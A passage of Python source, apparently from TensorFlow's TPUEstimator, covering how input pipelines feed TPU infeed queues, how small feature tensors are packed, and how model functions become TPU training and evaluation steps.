'`features` and `labels`.')
if batch_axis is not None:
raise TypeError('For mode PREDICT, batch_axis is not supported yet.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
By providing this as a Fn, it can be invoked inside the tf.while_loop such that
the input pipeline for multiple iterations can be executed by one
Session.run call.
Returns:
list of dict of ops.
"""
with tf.compat.v1.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
features, labels, enqueue_datas_list = (
_tpu_estimator_embedding.split_inputs(
ctx,
features,
labels,
num_cores_per_batch=num_of_replicas_per_host))
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = (
infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl))
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_per_host_v2_enqueue_ops_fn_for_host(ctx, input_fn,
inputs_structure_recorder,
device, host_id,
invocation_index):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
with tf.compat.v1.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=device,
invocation_index=invocation_index,
host_id=host_id)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for the PER_HOST_V2 '
'input pipeline configuration.')
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=max(1, ctx.num_of_replicas_per_host))
dataset_initializer = inputs.dataset_initializer()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def device_function_impl(shard_id):
if ctx.device_assignment is not None:
# Find the replica_id of the host's logical core 0.
# The current host_id is guaranteed to contain the logical core 0,
# even when num_cores_per_replica > num_cores_per_host -- the function
# caller makes sure that this host_id will be receiving data (calls
# input_fn).
replica_id = ctx.device_assignment.lookup_replicas(
task_id=host_id, logical_core=0)[shard_id]
return ctx.tpu_host_placement_function(replica_id=replica_id)
else:
return None
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
enqueue_datas_list = []
# Be aware that when num_cores_per_replica > num_cores_per_host,
# ctx.num_of_replicas_per_host is 0.
num_replicas_per_host = max(1, ctx.num_of_replicas_per_host)
cached_signals = None
with tf.compat.v1.device(device):
if not inputs.is_dataset:
raise TypeError('`input_fn` must return a `Dataset` for this mode.')
for host in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
if ctx.allow_per_host_v2_parallel_get_next:
features, labels = inputs.features_and_labels() # Calls get_next()
with tf.control_dependencies(control_deps):
if not ctx.allow_per_host_v2_parallel_get_next:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All the replicas share the replica 0's stopping signal.
# This avoids inconsistent state among different model replicas.
if cached_signals:
signals['stopping'] = cached_signals['stopping']
else:
cached_signals = signals
features, labels, enqueue_data = (
_tpu_estimator_embedding.split_inputs(ctx, features, labels))
if len(enqueue_data) != 1:
raise RuntimeError(('Missing or extra enqueue_data for host {}. '
'len(enqueue_data) = {}.').format(
host, len(enqueue_data)))
enqueue_datas_list.append(enqueue_data[0])
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]))
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
captured_infeed_queue.capture(infeed_queue)
if ctx.embedding_config:
per_host_enqueue_ops.extend(
ctx.embedding_config.tpu_embedding.generate_enqueue_ops(
enqueue_datas_list))
if signals is None:
return per_host_enqueue_ops
else:
return {
'ops': per_host_enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
def generate_broadcast_enqueue_ops_fn(ctx, input_fn, inputs_structure_recorder,
num_hosts):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
dataset_initializer = None
device_0 = ctx.tpu_host_placement_function(host_id=0)
with tf.compat.v1.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0, host_id=0)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
'For mode PREDICT, `input_fn` must return `Dataset` instead of '
'`features` and `labels`.')
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True)
if is_dataset:
dataset_initializer = inputs.dataset_initializer()
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(shard_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=shard_id)
else:
return shard_id % num_replicas_per_host
def device_function_impl(shard_id):
# shard_id ranges from 0 to num_of_replicas_per_host - 1.
# A shard is a replica inside a host.
# In broadcast mode (generate_broadcast_enqueue_ops_fn), the enqueue ops
# are always executed on the first host. Thus shard_id equals replica_id.
return ctx.tpu_host_placement_function(replica_id=shard_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
num_replicas = ctx.num_replicas
core_id = 0
for host_id in xrange(num_hosts):
with tf.compat.v1.device(
ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcasted to other replicas (including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels)
flattened_inputs = (
inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals))
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
input_slices = [
tf.split(x, num_replicas) for x in flattened_inputs
]
if (ctx.config.tpu_config.eval_training_input_configuration is
tpu_config.InputPipelineConfig.SLICED):
# for each core, slice out the flattened_inputs for each core.
broadcasted_inputs.append([x[core_id] for x in input_slices])
core_id += 1
else:
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0]))
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl)
if signals is None:
return enqueue_ops
else:
return {
'ops': enqueue_ops,
'signals': signals,
}
return enqueue_ops_fn, captured_infeed_queue, dataset_initializer
class TensorPacker(object):
"""Pack and unpack small tensors into a big one for efficiency."""
def __init__(self, small_feature_dim_size,
minimum_num_small_features_to_group):
self._small_feature_dim_size = small_feature_dim_size
self._minimum_num_small_features_to_group = (
minimum_num_small_features_to_group)
def maybe_concatenate_features(self, features):
"""If there are enough small tensors, concat them for performance."""
self._small_feature_names = {}
self._small_feature_sizes = {}
feature_names = _extract_key_names(features)
if feature_names: # Not a single tensor.
# First pass: see if it is worth concatenating the small features.
for name in feature_names:
tensor = features[name]
# We do not handle nested inputs here.
if not isinstance(tensor, tf.Tensor):
return
shape = tensor.get_shape().as_list()
dtype = tensor.dtype
if (len(shape) == 2 and shape[1] is not None and
shape[1] <= self._small_feature_dim_size):
tf.compat.v1.logging.info('Found small feature: %s %s', name, shape)
if tensor.dtype not in self._small_feature_names:
self._small_feature_names[dtype] = []
self._small_feature_sizes[dtype] = []
self._small_feature_names[dtype].append(name)
self._small_feature_sizes[dtype].append(shape[1])
dtypes_ = list(self._small_feature_names.keys())
for dtype in dtypes_:
# If we could find 5 (or more) [batch_size, 1] dense features,
# we will group them.
if (len(self._small_feature_names[dtype]) <
self._minimum_num_small_features_to_group):
self._small_feature_names.pop(dtype) # reset
self._small_feature_sizes.pop(dtype) # reset
# Second pass: separate small features out
small_feature_tensors = {}
for dtype in self._small_feature_names:
small_feature_tensors[dtype] = []
for name in self._small_feature_names[dtype]:
small_feature_tensors[dtype].append(features.pop(name))
# Add the concat Tensor to features with a special key.
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
if key in features:
raise ValueError('{} is reserved as feature key for concatenated '
'small features.'.format(key))
features[key] = (tf.concat(small_feature_tensors[dtype], axis=1))
def maybe_split_features(self, maybe_concatenated_features):
for dtype in self._small_feature_names:
key = self._get_small_feature_key(dtype)
concatenated_small_features = maybe_concatenated_features.pop(key)
splits = tf.split(
concatenated_small_features, self._small_feature_sizes[dtype], axis=1)
for name, split in zip(self._small_feature_names[dtype], splits):
maybe_concatenated_features[name] = split
def _get_small_feature_key(self, dtype):
return _TENSOR_PACKER_CONCATENATED_SMALL_FEATURES_KEY + '_' + str(dtype)
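# Illustrative sketch of how TensorPacker is used around the infeed boundary
# (hypothetical `features` dict with several [batch, 1] tensors of one dtype;
# not executed as part of this module):
#
#   packer = TensorPacker(_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE,
#                         _TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP)
#   packer.maybe_concatenate_features(features)  # replaces 5+ small features of a
#                                                # dtype with one concatenated tensor
#   ...                                          # transfer through infeed/outfeed
#   packer.maybe_split_features(features)        # restores the original keys/shapes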
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples, one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). Both `features` and `labels` can be any nested structure
supported by TF nest (namely, dicts, tuples, namedtuples or any nested
structure of such Tensors). `labels` could be `None` as well.
These are flattened before they are passed to the infeed/outfeed library
as that expects flattened lists.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, 'must have 1 or 2 elements.'
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, ('input_partition_dims[0] must '
'not be None')
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, 'InputsStructureRecorder is not initialized.'
return self._flattened_input_dims
def has_labels(self):
return 'labels' in self._feature_structure
def _flatten_input_dims(self, features, labels, feature_dims, label_dims):
"""Flatten input dims with the same order as flattened input tensors."""
try:
flattened_input_dims = data_nest.flatten_up_to(features, feature_dims)
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched the structure of'
' features. input_partition_dims[0]: {}, features {}. {}'.format(
feature_dims, features, e))
if labels is not None:
if label_dims is not None:
try:
flattened_input_dims.extend(
data_nest.flatten_up_to(labels, self._label_dims))
except TypeError as e:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched the structure of'
' labels. input_partition_dims[1]: {}, labels: {}. {}'.format(
label_dims, labels, e))
else:
num_label_tensors = len(data_nest.flatten(labels))
flattened_input_dims.extend([None] * num_label_tensors)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
'TPUConfig.input_partition_dims[0] mismatched feature'
' keys. Expected {}, got {}'.format(feature_names,
feature_dims_names))
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
'TPUConfig.input_partition_dims[1] mismatched label'
' keys. Expected {}, got {}'.format(label_names,
label_dims_names))
self._flattened_input_dims = self._flatten_input_dims(
features, labels, self._feature_dims, self._label_dims)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self.tensor_packer = TensorPacker(
_TENSOR_PACKER_SMALL_FEATURE_DIM_SIZE,
_TENSOR_PACKER_MINIMUM_NUM_SMALL_FEATURES_TO_GROUP)
self.tensor_packer.maybe_concatenate_features(features)
self._feature_structure['features'] = features
if labels is not None:
self._feature_structure['labels'] = labels
if signals is not None:
self._feature_structure['signals'] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have identical structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(self._feature_structure,
flattened_inputs)
features = unflattened_inputs['features']
self.tensor_packer.maybe_split_features(features)
return _Inputs(
features,
unflattened_inputs.get('labels'),
signals=unflattened_inputs.get('signals'))
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# When tf.while_loop is called, its body function (which invokes the
# `enqueue_fn` passed in) is traced to construct the graph, so the input_fn
# structure is recorded at that point.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure())
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
# The unflatten process uses the structure information recorded above.
return self._inputs_structure_recorder.unflatten_features_and_labels(
values)
return (enqueue_ops, dequeue_fn, all_hooks, run_infeed_loop_on_coordinator)
def _invoke_input_fn_and_record_structure(self):
"""Deploys the input pipeline and record input structure."""
enqueue_ops = []
infeed_queues = []
all_dataset_initializers = []
num_hosts = self._ctx.num_hosts
tpu_host_placement_fn = self._ctx.tpu_host_placement_function
run_infeed_loop_on_coordinator = True
if self._sharded_per_core:
# Per-core input pipeline deployment.
# Invoke the input pipeline for each core and place it on the corresponding
# host.
for host_id in range(num_hosts):
host_device = tpu_host_placement_fn(host_id=host_id)
with tf.compat.v1.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
enqueue_ops_fn, captured_infeed_queue = (
generate_per_core_enqueue_ops_fn_for_host(
self._ctx, self._input_fn, self._inputs_structure_recorder,
host_device, host_id))
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
run_infeed_loop_on_coordinator = False
enqueue_ops.append(
_wrap_computation_in_while_loop(
device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
# Infeed_queue_getter must be called after enqueue_ops_fn is called.
infeed_queues.append(captured_infeed_queue.get())
elif self._ctx.is_input_broadcast_with_iterators():
# Only calls input_fn in host 0.
host_device = tpu_host_placement_fn(host_id=0)
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_broadcast_enqueue_ops_fn(self._ctx, self._input_fn,
self._inputs_structure_recorder,
num_hosts))
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
else:
# This branch handles two scenarios:
# num_cores_per_replica > num_cores_per_host
# and num_cores_per_replica <= num_cores_per_host
# First, get the set of host_ids, by iterating replicas.
# We only want and will get the set of *unique* host_ids
# *that will call input_fn*. For each replica, we only call the input_fn
# from the CPU host that contains logical core 0.
# Use a list here to ensure deterministic order.
host_id_with_invocation_id_pair = []
if not self._ctx.is_replica_across_hosts():
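# Each replica fits within a single host, so every host invokes input_fn
# exactly once and host_id doubles as the invocation index.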
for host_id in range(num_hosts):
invocation_index = host_id
host_id_with_invocation_id_pair.append((host_id, invocation_index))
else:
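# Replicas may span multiple hosts; derive, from the replica's device
# string, the host that owns logical core 0 of each replica.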
for replica_id in xrange(self._ctx.num_replicas):
invocation_index = replica_id
host_device, _ = self._ctx.device_for_replica(replica_id)
# TODO(lehou): Get host_id in a better way.
host_id = int(host_device.split('/task:')[1].split('/device:')[0])
host_id_with_invocation_id_pair.append((host_id, invocation_index))
for (host_id, invocation_index) in host_id_with_invocation_id_pair:
host_device = tpu_host_placement_fn(host_id=host_id)
with tf.compat.v1.device(host_device):
with ops.name_scope('input_pipeline_task%d' % (host_id)):
if self._ctx.is_input_per_host_with_iterators():
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_v2_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, host_device, host_id,
invocation_index))
else:
enqueue_ops_fn, captured_infeed_queue, dataset_initializer = (
generate_per_host_enqueue_ops_fn_for_host(
self._ctx, self._input_fn,
self._inputs_structure_recorder, self._batch_axis,
host_device, host_id))
# NOTE(xiejw): We dispatch here based on the return type of the
# user's `input_fn`.
#
# 1. If input_fn returns a Dataset instance, we initialize the
# iterator outside of tf.while_loop, and call the iterator.get_next
# inside tf.while_loop. This should be always safe.
#
# 2. If input_fn returns (features, labels), it is too late to wrap
# them inside tf.while_loop, as resource initialization cannot be
# handled in TF control flow properly. In this case, we will use
# python loop to enqueue the data into TPU system. This may be
# slow compared to the previous case.
if dataset_initializer:
all_dataset_initializers.append(dataset_initializer)
run_infeed_loop_on_coordinator = False
wrap_fn = (
_wrap_computation_in_while_loop
if self._ctx.mode != model_fn_lib.ModeKeys.PREDICT else
_wrap_computation_in_while_loop_with_stopping_signals)
enqueue_ops.append(
wrap_fn(device=host_device, op_fn=enqueue_ops_fn))
else:
enqueue_ops.append(enqueue_ops_fn())
infeed_queues.append(captured_infeed_queue.get())
# infeed_queue is used to generate dequeue ops. The only things it uses for
# dequeue are the dtypes and shapes, so any one of the queues can be used.
# Here, grab the first one.
self._infeed_queue = infeed_queues[0]
return enqueue_ops, [
util_lib.MultiHostDatasetInitializerHook(all_dataset_initializers)
], run_infeed_loop_on_coordinator
def _validate_input_pipeline(self):
"""Validates the input pipeline.
Performs some sanity checks and logs user-friendly information. Ideally we
should error out to give users a better error message, but if
_WRAP_INPUT_FN_INTO_WHILE_LOOP is False (legacy behavior) we cannot break
user code, so we only log a warning.
Raises:
RuntimeError: If the validation failed.
"""
if tf.compat.v1.get_default_graph().get_collection(
tf.compat.v1.GraphKeys.QUEUE_RUNNERS):
err_msg = ('Input pipeline contains one or more QueueRunners. '
           'It could be slow and not scalable. Please consider '
           'converting your input pipeline to use `tf.data` instead (see '
           'https://www.tensorflow.org/guide/datasets for '
           'instructions).')
if _WRAP_INPUT_FN_INTO_WHILE_LOOP:
raise RuntimeError(err_msg)
else:
logging.warn(err_msg)
def call_computation(computation_inputs, computation, batch_config=None):
"""Call computation.
Args:
computation_inputs: A tensor or dict of tensors, the inputs to the
computation.
computation: A Python function that takes the computation inputs and builds
the computation graph. If `computation` returns m outputs, this function
will return a list of m Tensors.
batch_config: A BatchConfig named tuple specifying the batching
configuration to use for inference batching.
Returns:
A list of output tensors.
"""
# Using `TPUPartitionedCall` makes it possible to target a different
# TPU core with every `Session.run()` call. Note that the entire inference
# graph executes on a single core, and that invocations of this graph
# will round-robin among the cores attached to a host.
def tpu_partitioned_call(partition_inputs):
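"""Wraps `computation` in a Defun and dispatches it via TPUPartitionedCall."""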
# capture_resource_var_by_value enables variables to be mirrored on TPU
# to avoid fetching from CPU, since variables do not change during
# inference.
@function.Defun(capture_resource_var_by_value=False)
def tpu_subgraph():
return computation(partition_inputs)
return tpu_functional.TPUPartitionedCall(
args=tpu_subgraph.captured_inputs,
device_ordinal=tpu_ops.tpu_ordinal_selector(),
Tout=[o.type for o in tpu_subgraph.definition.signature.output_arg],
f=tpu_subgraph)
# Not using the batching function; just use TPUPartitionedCall across all cores.
if not batch_config:
return tpu_partitioned_call(computation_inputs)
# Use Batching Function and TPUPartitionedCall/all cores.
# Note that BatchingFunction requires a list of tensors and doesn't support
# a dict of tensors. So we preserve the structure by deterministically
# flattening the dict before batching and then recomposing it after batching
# to feed into the computation.
ordered_inputs_list = tf.nest.flatten(computation_inputs)
@tf.nondifferentiable_batch_function(
num_batch_threads=batch_config.num_batch_threads,
max_batch_size=batch_config.max_batch_size,
batch_timeout_micros=batch_config.batch_timeout_micros,
allowed_batch_sizes=batch_config.allowed_batch_sizes,
max_enqueued_batches=batch_config.max_enqueued_batches,
autograph=False)
def batched_tpu_computation(*tensor_args):
"""Recompose the input feature dict and calls the TPU computation."""
computation_feature_input = tf.nest.pack_sequence_as(
computation_inputs, tensor_args)
return tpu_partitioned_call(computation_feature_input)
return batched_tpu_computation(*ordered_inputs_list)
class _ModelFnWrapper(object):
"""A `model_fn` wrapper.
This makes calling model_fn on CPU and TPU easier and more consistent, and
performs the necessary checks and mutations required by TPU training and
evaluation.
In addition, this wrapper manages converting the `model_fn` to a single TPU
train and eval step.
"""
def __init__(self, model_fn, config, params, ctx):
self._model_fn = model_fn
self._config = config
self._params = params
self._ctx = ctx
def call_without_tpu(self, features, labels, is_export_mode):
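"""Calls the user `model_fn` directly, without TPU-specific rewriting."""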
return self._call_model_fn(features, labels, is_export_mode=is_export_mode)
def _add_embedding_features(self, features, hook_dummy_table_variables):
"""Add embedding features, optionally add hook to intercept gradient."""
if self._ctx.embedding_config:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
embedding_activations = tpu_embedding_.get_activations()
if hook_dummy_table_variables:
new_embedding_activations = (
tpu_embedding_gradient.hook_dummy_table_variables_to_activations(
tpu_embedding_, embedding_activations,
self._ctx.embedding_config.dummy_table_variables))
features.update(new_embedding_activations)
else:
features.update(embedding_activations)
def convert_to_single_tpu_train_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single train step on TPU.
The user provided `model_fn` takes input tuple
(features, labels) and produces the EstimatorSpec with train_op and loss for
train `mode`. This usually represents a single train computation on CPU.
For TPU training, a train (computation) step is first wrapped in a
tf.while_loop control flow to repeat many times and then replicated to
all TPU shards. Besides, the input should be taken from the TPU infeed rather
than the input pipeline (input_fn) directly. To fit the TPU loop-and-replicate
pattern, the original train computation should be reformed, which is the
returned `train_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
infeed dequeue channel.
Returns:
A tuple of (train_fn, host_call, captured scaffold_fn, captured training
hooks). The train_fn represents the train step for TPU.
"""
host_call = _OutfeedHostCall(
self._ctx,
outfeed_every_n_steps=self._config.tpu_config
.experimental_host_call_every_n_steps)
captured_scaffold_fn = _CapturedObject()
captured_training_hooks = _CapturedObject()
def train_step(step):
"""Training step function for use inside a while loop."""
inputs = dequeue_fn()
features, labels = inputs.features_and_labels()
self._add_embedding_features(features, True)
estimator_spec = self._verify_estimator_spec(
self._call_model_fn(features, labels))
loss, train_op = estimator_spec.loss, estimator_spec.train_op
if tensor_tracer.TensorTracer.is_enabled():
tt = tensor_tracer.TensorTracer()
loss = tt.trace_tpu(tf.compat.v1.get_default_graph(), loss, train_op,
self._ctx.num_replicas)
tracer_host_call = tt.host_call_deps_and_fn()
else:
tracer_host_call = {}
if isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec): # pylint: disable=protected-access
captured_scaffold_fn.capture(estimator_spec.scaffold_fn)
else:
captured_scaffold_fn.capture(None)
captured_training_hooks.capture(estimator_spec.training_hooks)
if self._ctx.embedding_config is None:
apply_sparse_grads = []
else:
tpu_embedding_ = self._ctx.embedding_config.tpu_embedding
gradients = (
tpu_embedding_gradient.get_gradients_through_dummy_table_variables(
tpu_embedding_))
grad_multiplier = self._ctx.embedding_config.get_grad_multiplier()
if grad_multiplier is not None:
scaled_gradients = collections.OrderedDict(
(k, v * grad_multiplier) for k, v in six.iteritems(gradients))
else:
scaled_gradients = gradients
apply_sparse_grads = [
tpu_embedding_.generate_send_gradients_op(
scaled_gradients, tf.compat.v1.train.get_global_step())
]
stopping_signals = None
user_provided_stopping_signals_name = None
if self._ctx.feed_hook is not None:
stopping_signals, user_provided_stopping_signals_name = \
self._ctx.feed_hook.get_stopping_signals_and_name(features)
# We must run train_op to update the variables prior to running the
# outfeed.
with tf.control_dependencies([train_op] + apply_sparse_grads):
host_call_outfeed_ops = []
host_call_fn, host_call_args = None, []
if (isinstance(estimator_spec, model_fn_lib._TPUEstimatorSpec) # pylint: disable=protected-access
and estimator_spec.host_call is not None):
host_call_fn, host_call_args = estimator_spec.host_call
if stopping_signals is not None:
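# Route the user-provided stopping signals through the outfeed (as an
# identity host call) so they are visible on the coordinator side.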
identity_fn = lambda **kwargs: kwargs
tracer_host_call[user_provided_stopping_signals_name] = [
identity_fn, stopping_signals
]
if host_call_fn:
# Ignore dummy hostcalls (no arguments)
if host_call_args:
tracer_host_call.update({'host_call': estimator_spec.host_call})
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
elif tracer_host_call:
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
else:
# Create a host call for the loss to track execution progress
# Without this, we don't have any indication of the state of the
# TPU program.
tracer_host_call.update(
{'host_call': (lambda loss_t: loss_t, [tf.reshape(loss, [1])])})
host_call.record(tracer_host_call)
host_call_outfeed_ops = host_call.create_enqueue_op(step)
with tf.control_dependencies(host_call_outfeed_ops):
return tf.identity(loss)
return (train_step, host_call, captured_scaffold_fn,
captured_training_hooks)
def convert_to_single_tpu_eval_step(self, dequeue_fn):
"""Converts user provided model_fn` as a single eval step on TPU.
Similar to training, the user provided `model_fn` takes input tuple
(features, labels) and produces the TPUEstimatorSpec with eval_metrics for
eval `mode`. This usually represents a single evaluation computation on CPU.
For TPU evaluation, an eval (computation) step is first wrapped in a
tf.while_loop control flow to repeat many times and then replicated to
all TPU shards. Besides, the input and output are slightly different. The input,
features and labels, should be taken from TPU infeed rather than input
pipeline (input_fn) directly. Output is managed in two stages. First, the
model outputs as the result of evaluation computation, usually model logits,
should be transferred from TPU system to CPU. Then, all model outputs are
concatenated first on CPU and sent to the metric_fn for metrics computation.
To fit TPU evaluation pattern, the original eval computation should be
reformed, which is the returned `eval_step`.
Args:
dequeue_fn: The function to retrieve inputs, features and labels, from TPU
